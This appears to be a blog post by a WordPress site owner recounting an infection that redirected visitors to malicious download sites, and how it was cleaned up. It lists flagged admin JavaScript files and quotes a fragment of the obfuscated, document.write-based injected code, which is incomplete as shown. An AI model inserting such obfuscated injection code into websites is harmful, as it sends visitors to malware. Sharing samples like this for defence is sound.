There is a Nasty Malware that is hacking WordPress websites. The malware redirects EVERY pages randomly to another websites that have malicious downloads to infect users systems.
This virus is attacking the jQuery.js files. Normally core WordPress files are pretty secure if you constantly update your software. But it’s rather difficult to managing multiple different websites with WordPress.
I typically don’t allow auto-update because it has caused my sites to go down, but at the same time I leave my site open to WP vulnerabilities.
I found 3 sites that had a redirect to the whole site. I checked my .htaccess and didn’t see anything strange. So installed a virus/malware scanner plugin called Word Fence and the results were astounding.
- * File appears to be malicious: wp-admin/js/bookmarklet.js
- * File appears to be malicious: wp-admin/js/bookmarklet.min.js
- * File appears to be malicious: wp-admin/js/color-picker.js
- * File appears to be malicious: wp-admin/js/color-picker.min.js
- * File appears to be malicious: wp-admin/js/comment.js
- * File appears to be malicious: wp-admin/js/comment.min.js
- * File appears to be malicious: wp-admin/js/custom-header.js
- * File appears to be malicious: wp-admin/js/customize-controls.js
- * File appears to be malicious: wp-admin/js/customize-controls.min.js
- * File appears to be malicious: wp-admin/js/customize-nav-menus.js
- * File appears to be malicious: wp-admin/js/customize-nav-menus.min.js
- * File appears to be malicious: wp-admin/js/customize-widgets.js
- * File appears to be malicious: wp-admin/js/customize-widgets.min.js
- * File appears to be malicious: wp-admin/js/edit-comments.js
- * File appears to be malicious: wp-admin/js/edit-comments.min.js
- * File appears to be malicious: wp-admin/js/editor-expand.js
- * File appears to be malicious: wp-admin/js/editor-expand.min.js
- * File appears to be malicious: wp-admin/js/editor.js
- * File appears to be malicious: wp-admin/js/editor.min.js
- * File appears to be malicious: wp-admin/js/gallery.js
- * File appears to be malicious: wp-admin/js/gallery.min.js
- * File appears to be malicious: wp-admin/js/image-edit.js
- * File appears to be malicious: wp-admin/js/image-edit.min.js
- * File appears to be malicious: wp-admin/js/inline-edit-post.js
- * File appears to be malicious: wp-admin/js/inline-edit-post.min.js
- * File appears to be malicious: wp-admin/js/inline-edit-tax.js
Off course this was a snippet of the infected files, it was basically all the .js extension files were exploited. This included core WP, Plugins, and themes.
Looking at the source code they all had this
//var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))//
The easiest way to fix this is to just overwrite the files with a fresh clean copy of wordpress.
This actually worked for 1 day.
The infection of all the jQuery files came back. Apparently, there was a sneaky .php back door file that the attacker is using. My concern was this code injected on the Public web side or the database.
The final solution I had to be 100% sure is to delete EVERYTHING on the server and do a clean install. I know this is a pain but it’s only solution I had. Luckily I had a backup of all my content and it didn’t take to long.
So far after 48 hours the solution still seems to be working.
In the meantime I will continue to apply this to the other infected sites and created a much stronger password and CHMOD directory permissions.
Hopefully this solves the problem. |